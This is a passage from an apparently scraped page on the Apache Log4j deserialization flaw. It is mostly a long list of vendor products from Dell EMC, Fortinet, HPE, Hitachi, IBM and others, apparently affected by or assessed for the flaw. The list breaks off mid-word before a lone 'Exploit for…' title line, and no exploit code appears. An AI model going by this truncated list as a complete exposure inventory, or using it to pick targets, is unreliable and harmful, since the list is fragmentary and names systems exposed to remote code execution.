OS \nDell EMC Data Protection Advisor \nDell EMC Data Protection Central \nDell EMC Data Protection Search \nDell EMC DataIQ \nDell EMC Dell Hybrid Client (DHC) \nDell EMC Dell ImageAssist \nDell EMC Dell Networking X-Series \nDell EMC Dell Open Manage Mobile \nDell EMC Dell Open Manage Server Administrator \nDell EMC Dell Open Management Enterprise \u2013 Modular \nDell EMC Dell OpenManage Change Management \nDell EMC Dell OpenManage Enterprise Power Manager Plugin \nDell EMC Dell Wyse Management Suite Import Tool \nDell EMC DellEMC OpenManage Enterprise Services \nDell EMC Disk Library for Mainframe \nDell EMC ECS \nDell EMC Embedded NAS \nDell EMC Enterprise Hybrid Cloud \nDell EMC Enterprise Storage Analytics for vRealize Operations \nDell EMC Equallogic PS \nDell EMC GeoDrive \nDell EMC ISG Drive & Storage Media \nDell EMC Infinity MLK (firmware) \nDell EMC Integrated Dell Remote Access Controller (iDRAC) \nDell EMC Integrated System for Azure Stack HCI \nDell EMC Integrated System for Microsoft Azure Stack Hub \nDell EMC Isilon InsightIQ \nDell EMC IsilonSD Management Server \nDell EMC License Manager \nDell EMC Mainframe Enablers \nDell EMC Metro Node \nDell EMC MyDell Mobile \nDell EMC NetWorker \nDell EMC Networking BIOS \nDell EMC Networking N-Series \nDell EMC Networking OS9 \nDell EMC Networking Onie \nDell EMC Networking Virtual Edge Platform with VersaOS \nDell EMC OMIMSSC (OpenManage Integration for Microsoft System Center) \nDell EMC OMNIA \nDell EMC OpenManage Connections \u2013 Nagios \nDell EMC OpenManage Connections \u2013 ServiceNow \nDell EMC OpenManage Enterprise \nDell EMC OpenManage Integration for Microsoft System Center for System Center Operations Manager \nDell EMC OpenManage Integration for VMware vCenter \nDell EMC OpenManage Integration with Microsoft Windows Admin Center \nDell EMC OpenManage Management pack for vRealize Operations \nDell EMC OpenManage Network Integration \nDell EMC OpenManage Operations Connector for Micro Focus Operations Bridge Manager \nDell EMC OpenManage integration for Splunk \nDell EMC PPDM Search \nDell EMC PowerEdge BIOS \nDell EMC PowerEdge Operating Systems \nDell EMC PowerFlex Appliance \nDell EMC PowerFlex Manager \nDell EMC PowerFlex Rack \nDell EMC PowerFlex Software (SDS) \nDell EMC PowerMax, VMAX, VMAX3 and VMAX AFA \nDell EMC PowerPath \nDell EMC PowerProtect Cyber Recovery \nDell EMC PowerProtect DP Series Appliance (iDPA) \nDell EMC PowerProtect Data Manager \nDell EMC PowerScale OneFS \nDell EMC PowerShell for PowerMax \nDell EMC PowerShell for Powerstore \nDell EMC PowerShell for Unity \nDell EMC PowerStore \nDell EMC PowerSwitch Z9264F-ON BMC, Dell EMC PowerSwitch Z9432F-ON BMC \nDell EMC PowerVault ME4 Series Storage Arrays \nDell EMC RecoverPoint \nDell EMC Remotely Anywhere \nDell EMC Repository Manager (DRM) \nDell EMC Riptide (firmware) \nDell EMC Ruckus SmartZone 300 Controller \nDell EMC Ruckus Virtual Software \nDell EMC SRM vApp \nDell EMC SRS Policy Manager \nDell EMC SRS VE \nDell EMC Secure Connect Gateway (SCG) 5.0 Appliance \nDell EMC Secure Connect Gateway (SCG) Policy Manager \nDell EMC Server Storage \nDell EMC Smart Fabric Storage Software \nDell EMC SmartFabric Director \nDell EMC Software RAID \nDell EMC Solutions Enabler \nDell EMC Sonic \nDell EMC SourceOne \nDell EMC Storage Center OS and additional SC applications unless otherwise noted \nDell EMC Storage Center \u2013 Dell Storage Manager \nDell EMC Streaming Data Platform \nDell EMC SupportAssist Client Commercial \nDell EMC SupportAssist Client Consumer \nDell EMC SupportAssist Enterprise \nDell EMC Systems Update (DSU) \nDell EMC Unisphere 360 \nDell EMC Unisphere Central \nDell EMC Unisphere for PowerMax \nDell EMC Unisphere for VMAX \nDell EMC Unisphere for VNX \nDell EMC Unity \nDell EMC Update Manager Plugin \nDell EMC VNX Control Station \nDell EMC VNX2 \nDell EMC VNXe3200 \nDell EMC VPLEX \nDell EMC Vblock \nDell EMC ViPR Controller \nDell EMC Virtual Storage Integrator \nDell EMC Vsan Ready Nodes \nDell EMC VxBlock \nDell EMC VxFlex Ready Nodes \nDell EMC VxRail \nDell EMC Warnado MLK (firmware) \nDell EMC XC \nDell EMC XtremIO \nDell EMC iDRAC Service Module (iSM) \nDell EMC vRealize Data Protection Extension \nDell Open Management Enterprise - Modular \nDell OpenManage Enterprise \nDell Secure Connect Gateway (SCG) Appliance \nDell Secure Connect Gateway (SCG) Policy Manager \nDell SupportAssist Enterprise \nDell Unisphere Central \nDell VMware vRealize Automation 8.x \nDell VMware vRealize Orchestrator 8.x \nDell Vblock \nDell VxBlock \nDell Wyse Management Suite \nDell vRealize Data Protection Extension Data Management \nDell vRealize Data Protection Extension for vRealize Automation (vRA) 8.x \nDeltares Delft-FEWS \nDotCMS Hybrid Content Management System \nDynatrace ActiveGates \nDynatrace Cloud Services \nDynatrace Extensions \nDynatrace FedRamp SAAS \nDynatrace SAAS \nDynatrace Synthetic Private ActiveGate \nDynatrace Synthetic public locations \nEVL Labs JGAAP \nEaton Power Protector \nEaton Undisclosed \nEclecticIQ TIP \nElastic Logstash \nElastic search \nEllucian Banner Analytics \nEllucian Colleague \nEsri ArcGIS Data Store \nEsri ArcGIS Enterprise \nEsri ArcGIS GeoEvent Server \nEsri ArcGIS Server \nEsri ArcGIS Workflow Manager Server \nEsri Portal for ArcGIS \nEwon (HMS-Networks) eCatcher \nExtensis Universal Type Server \nExtraHop Reveal(x) \nExtreme Networks IQVA \nF-Secure Elements Connector \nF-Secure Endpoint Proxy \nF-Secure Messaging Security Gateway \nF-Secure Policy Manager \nFAST LTA Silent Brick \nFedEx Ship Manager \nFiix CMMS Core \nFiix CMMS core \nFileCap Server \nFortinet FortiAIOps \nFortinet FortiAnalyzer Big Data \nFortinet FortiCASB \nFortinet FortiCWP \nFortinet FortiConverter Portal \nFortinet FortiEDR Cloud \nFortinet FortiIsolator \nFortinet FortiMonitor \nFortinet FortiNAC \nFortinet FortiPolicy \nFortinet FortiPortal \nFortinet FortiSIEM \nFortinet FortiSOAR \nFortinet ShieldX \nFujitsu ETERNUS AB/HB \nFujitsu ETERNUS CS800 \nFujitsu ETERNUS DX/AF \nFujitsu ETERNUS JX \nFujitsu ETERNUS LT20/40/60 \nFujitsu ETERNUS SF \nGE Gas Power Asset Performance Management (APM) \nGE Gas Power Baseline Security Center (BSC) \nGE Gas Power Control Server \nGE Gas Power Tag Mapping Service \nGigamon Fabric Manager \nGitHub Enterprise Server \nGitHub Enterprise Cloud \nGitLab Dependency Scanning \nGitLab Gemnasium-Maven \nGitLab PMD OSS \nGitLab SAST \nGitLab Spotbugs \nGoAnywhere Gateway \nGoAnywhere MFT \nGradle Enterprise \nGraylog Forwarder \nGraylog Server \nGuardedBox \nHENIX Squash TM \nHP Teradici Cloud Access Controller \nHP Teradici EMSDK \nHP Teradici Management Console \nHP Teradici PCoIP Connection Manager \nHPE 3PAR Service Processor \nHPE 3PAR StoreServ Arrays \nHPE 3PAR StoreServ Management and Core Software Media \nHPE Aruba NetInsight Network Analytics \nHPE Authentication Server Function (AUSF) \nHPE B-series Fibre Channel Switch \nHPE B-series SAN Extension Switch \nHPE ClusterStor Data Services (CDS) \nHPE Cray EX System Monitoring Application (SMA) \nHPE Cray View for ClusterStor \nHPE Data Center Fabric Manager (DCNM) \u2013 C-Series DCNM \nHPE Data Management Framework \nHPE Device Entitlement Gateway (DEG) \nHPE Dragon \nHPE Dynamic SIM Provisioning (DSP) \nHPE Edge Infrastructure Automation \nHPE Ezmeral Container Platform \nHPE Ezmeral Data Fabric \nHPE Ezmeral Ecosystem Pack (EEP) \nHPE HP XP Command View Advanced Edition Software \u2013 HostDataCollector Component \nHPE Hyper Converged 250 System \nHPE Hyper Converged 250/380 System \nHPE Hyper Converged 380 \nHPE Infosight for Storage \nHPE Integrated Home Subscriber Server Software Series \nHPE Intelligent Assurance \nHPE Intelligent Management Center (IMC) Standard and Enterprise \nHPE Intelligent Management Center (iMC) \nHPE MSA \nHPE Media Workflow Master (MWM) \nHPE Network Function Virtualization Director (NFV Director) \nHPE Nimble Storage \nHPE OneView \nHPE Parallel File System Storage \nHPE Parallel Filesystem Storage (PFSS) \nHPE Primera Storage \nHPE RESTful Interface Tool (iLOREST) \nHPE Real Time Management System (RTMS) \nHPE Remote SIM Provisioning Manager (RSPM) \nHPE Revenue Intelligence Software Series \nHPE SANnav Management Software \nHPE Service Director (SD) \nHPE Shasta Monitoring Framework (SMF) \nHPE SimpliVity 2600 \nHPE SimpliVity 325 \nHPE SimpliVity 380 \nHPE SimpliVity OmniCube \nHPE Smart Storage Administrator (SSA) \nHPE StoreEasy \nHPE StoreEver CVTL \nHPE StoreEver LTO Tape Drives \nHPE StoreEver MSL Tape Libraries \nHPE StoreOnce \nHPE StoreServ Management Console (SSMC) \nHPE StoreVirtual \nHPE Telecom Analytics Smart Profile Server (TASPS) \nHPE Telecom Management Information Platform Software Series \nHPE Trueview Inventory Software Series \nHPE Unified Data Management (UDM) \nHPE Universal IoT (UioT) Platform \nHPE Unstructured Data Storage Function (UDSF) \nHPE User Data Repository (UDR) \nHPE Virtual Connect \nHPE Virtual Headend Manager (vHM) \nHPE XP Advanced Edition (HDVM) -Agent Component \nHPE XP Advanced Edition (HDVM) -Server Component \nHPE XP Command View \nHPE XP Common Services \nHPE XP Configuration Manager \nHPE XP Data Protection Manager (DPM) \nHPE XP Dynamic Link Manager (HDLM) \nHPE XP Global Link Manager (HGLM) \nHPE XP P9500 \nHPE XP Performance Advisor Software \nHPE XP Plugin \u2013 vCST (vCenter Storage Plugin), Redhat Ansible, Terraform, OLVM \nHPE XP Plugins \u2013 VASA, vROPs, SCOM, Veeam, Insight, HSPC, HRPC, HSPP, VSS, HDRE, Base Script, HBSD \nHPE XP Replication Manager (HRPM) \nHPE XP Tiered Storage Manager (HTSM) \nHPE XP Tuning Manager (HTNM) \nHPE XP7 \nHPE XP8 \nHPE Zerto products \nHPE enhanced Internet Usage Manager (eIUM) \nHelpsystems Clearswift Secure Email Gateway \nHelpsystems Clearswift Secure Exchange Gateway \nHelpsystems Clearswift Secure ICAP Gateway \nHelpsystems Clearswift Secure Web Gateway \nHexagon ERDAS APOLLO - Catalog Explorer \nHexagon Geoprocessing Server \nHexagon HxGN OnCall Mobile Admin \nHexagon HxGN OnCall Records \nHexagon M.App Enterprise \nHexagon M.App X - Geoprocessing Server \nHexagon inPURSUIT Server (Workflow) \nHitachi Energy Axis \nHitachi Energy FOXMAN-UN \nHitachi Energy Lumada APM On-premises \nHitachi Energy Lumada APM SaaS \nHitachi Energy Network Manager Outage Management Interface (OMI) \u2013 Third Party Oracle Database Components (Trace File Analyzer, SQL Developer, Property Graph) \nHitachi Energy Network Manager SCADA/EMS, Ranger and NMR Product \u2013 Third Party Oracle Database Components (Trace File Analyzer, SQL Developer, Property Graph) \nHitachi Energy RelCare \nHitachi Energy UNEM \nHitachi Energy e-Mesh Monitor \nHitachi Energy nMarket Global I-SEM \nHitachi Vantara Business Continuity Manager (BCM) \nHitachi Vantara CCI / RAID Manager \nHitachi Vantara Content Intelligence \nHitachi Vantara Content Platform (versions 8.2 and higher) \nHitachi Vantara Content Platform Anywhere \nHitachi Vantara Content Platform Gateway \nHitachi Vantara Content Platform S Series (all models) \nHitachi Vantara Export Tool 2 (Monitor 2) \nHitachi Vantara HCP for Cloud Scale \nHitachi Vantara HNAS 30\u00d70 Series \nHitachi Vantara HNAS 4000 Series \nHitachi Vantara HNAS 5000 Series \nHitachi Vantara Hitachi (VASA) Provider for VMware vCenter \nHitachi Vantara Hitachi 520H/X Blade (all versions) \nHitachi Vantara Hitachi 540A Blade (all versions) \nHitachi Vantara Hitachi Adaptable Modular Storage DF800S, DF800M, DF800H (AMS 2\u00d700) \nHitachi Vantara Hitachi Adapters (Bundle) for Oracle Database \nHitachi Vantara Hitachi Block Storage Driver (HBSD / OpenStack) \nHitachi Vantara Hitachi Compute Blade CB500, CB2000, CB2500 \nHitachi Vantara Hitachi Compute Systems Manager (HCSM) \nHitachi Vantara Hitachi Content Software for File (HCSF) \nHitachi Vantara Hitachi Data Ingestor \nHitachi Vantara Hitachi Device Manager (HDvM), HDVM Agent and HDVM Server are unaffected. \nHitachi Vantara Hitachi Disaster Recovery Solution (HDRS) \nHitachi Vantara Hitachi Dynamic Link Manager (HDLM) \nHitachi Vantara Hitachi File Services Manager (HFSM) \nHitachi Vantara Hitachi Global Link Manager (HGLM) \nHitachi Vantara Hitachi Infrastructure Analytics Advisor (HIAA) \nHitachi Vantara Hitachi Infrastructure Management Pack for VMware vRealize Operations (vROPS) \nHitachi Vantara Hitachi Ops Center Administrator (HSA) \nHitachi Vantara Hitachi Ops Center Automator (HAD) \nHitachi Vantara Hitachi Ops Center \u2013 Analyzer Viewpoint / Server / RAID Agent \nHitachi Vantara Hitachi Ops Center \u2013 Analyzer, Analyzer Probe \nHitachi Vantara Hitachi Ops Center \u2013 Common Services (HOC) \nHitachi Vantara Hitachi Ops Center \u2013 Configuration Manager REST API (HCM) \nHitachi Vantara Hitachi Ops Center \u2013 Protector \nHitachi Vantara Hitachi Remote Ops \nHitachi Vantara Hitachi Replication Manager (HRpM) \nHitachi Vantara Hitachi Replication Plugin for Containers (HRPC) \nHitachi Vantara Hitachi Storage Adapter for SAP HANA DBA Cockpit \nHitachi Vantara Hitachi Storage Adapter for VMware Site Recovery Manager (VSP SRA) \nHitachi Vantara Hitachi Storage Connector for VMware vRealize Orchestrator (vRO) \nHitachi Vantara Hitachi Storage Content Pack for VMware vRealize Log Insight (vRLI) \nHitachi Vantara Hitachi Storage Modules for Red Hat Ansible \nHitachi Vantara Hitachi Storage Plugin for Containers (HSPC) \nHitachi Vantara Hitachi Storage Plugin for Prometheus (HSPP) \nHitachi Vantara Hitachi Storage Plugin for VMware vCenter \nHitachi Vantara Hitachi Storage Replication Adapter for VMware Site Recovery Manager (VSP SRA) \nHitachi Vantara Hitachi Tiered Storage Manager (HTSM) \nHitachi Vantara Hitachi Tuning Manager (HTnM) \nHitachi Vantara Hitachi Unified Storage VM (HUS VM) HM700 \nHitachi Vantara Hitachi Virtual Storage Platform (VSP) RAID 700 \nHitachi Vantara Hitachi Virtual Storage Platform VSP 5200, VSP 5200H, VSP 5600, VSP 5600H \nHitachi Vantara Hitachi Virtual Storage Platform VSP E990, VSP E790, VSP E590 \nHitachi Vantara Hitachi Virtual Storage Platform VSP F/G350, VSP F/G370, VSP F/G700, VSP F/G900 \nHitachi Vantara Hitachi Virtual Storage Platform VSP G200, VSP F/G/N400, VSP F/G/N600, VSP F/G/N800 \nHitachi Vantara Infrastructure Adapter for Microsoft Windows Powershell \nHitachi Vantara Ops Center Protector Adapter for VMware Site Recovery Manager (Protector SRA) \nHitachi Vantara Ops Center Protector Connector for VMware vRealize Orchestrator (Protector vRO) \nHitachi Vantara SMU \nHitachi Vantara Storage Navigator Modular 2 (SNM2) \nHitachi Vantara UCP Advisor \nHitachi Vantara Veeam Plugin for VSP Storage \nHitachi Vantara Virtual Storage Platform Gx00/Fx00 NAS Modules \nHitachi Vantara Virtual Storage Platform Nx00 NAS Modules \nHitachi Vantara ashiCorp Terraform Provider for Hitachi Storage \nHostiFi Unifi hosting \nHuawei products \nIBM A9000/R \nIBM Block Storage \nIBM Business Automation Workflow \nIBM Cloud Backup \nIBM Cloud Object Storage \nIBM Cloud Private \nIBM Cognos Analytics \nIBM Content Delivery Network \nIBM Copy Services Manager \nIBM Curam SPM \nIBM DB2 Server \nIBM DS8000 Hardware Management Console \nIBM Elastic Storage System (ESS) \nIBM File Storage \nIBM Flash System 900 (& 840) \nIBM FlashSystem 5000 Series \nIBM FlashSystem 7000 Series \nIBM FlashSystem 9000 Series \nIBM FlashSystem v9000 \nIBM Hyper-Scale Manager (HSM) \nIBM MQ \nIBM Netezza \nIBM Power HMC \nIBM Power Hardware Management Console \nIBM PowerVM Hypervisor \nIBM PowerVM VIOS \nIBM SAN Volume Controller and Storwize Family \nIBM SPSS Statistics \nIBM Security Access Manager \nIBM Spectrum Accelerate \nIBM Spectrum Archive Library Edition \nIBM Spectrum Conductor \nIBM Spectrum Control \nIBM Spectrum Copy Data Management \nIBM Spectrum Discover \nIBM Spectrum Protect Backup-Archive Client \nIBM Spectrum Protect Client Management Service \nIBM Spectrum Protect Client Web User Interface \nIBM Spectrum Protect HSM for Windows \nIBM Spectrum Protect Operations Center \nIBM Spectrum Protect Plus \nIBM Spectrum Protect Server \nIBM Spectrum Protect Snapshot for UNIX \nIBM Spectrum Protect Snapshot for VMware \nIBM Spectrum Protect Snapshot for Windows \nIBM Spectrum Protect for Databases: Data Protection for Oracle \nIBM Spectrum Protect for Databases: Data Protection for SQL \nIBM Spectrum Protect for Enterprise Resource Planning \nIBM Spectrum Protect for Mail: Data Protection for Domino \nIBM Spectrum Protect for Mail: Data Protection for Exchange \nIBM Spectrum Protect for Space Management \nIBM Spectrum Protect for Virtual Environments: Data Protection for Hyper-V \nIBM Spectrum Protect for Virtual Environments: Data Protection for VMware \nIBM Spectrum Protect for Workstations \nIBM Spectrum Protect for z/OS USS Client and API \nIBM Spectrum Scale \nIBM Spectrum Symphony \nIBM Spectrum Virtualize \nIBM Sterling Fulfillment Optimizer \nIBM Sterling Inventory Visibility \nIBM Storage TS2280 \nIBM Storage TS2900 Library \nIBM Storage TS4500 Library \nIBM Storage Virtuali
Exploit for Deserialization of Untrusted Data in Apache Log4J
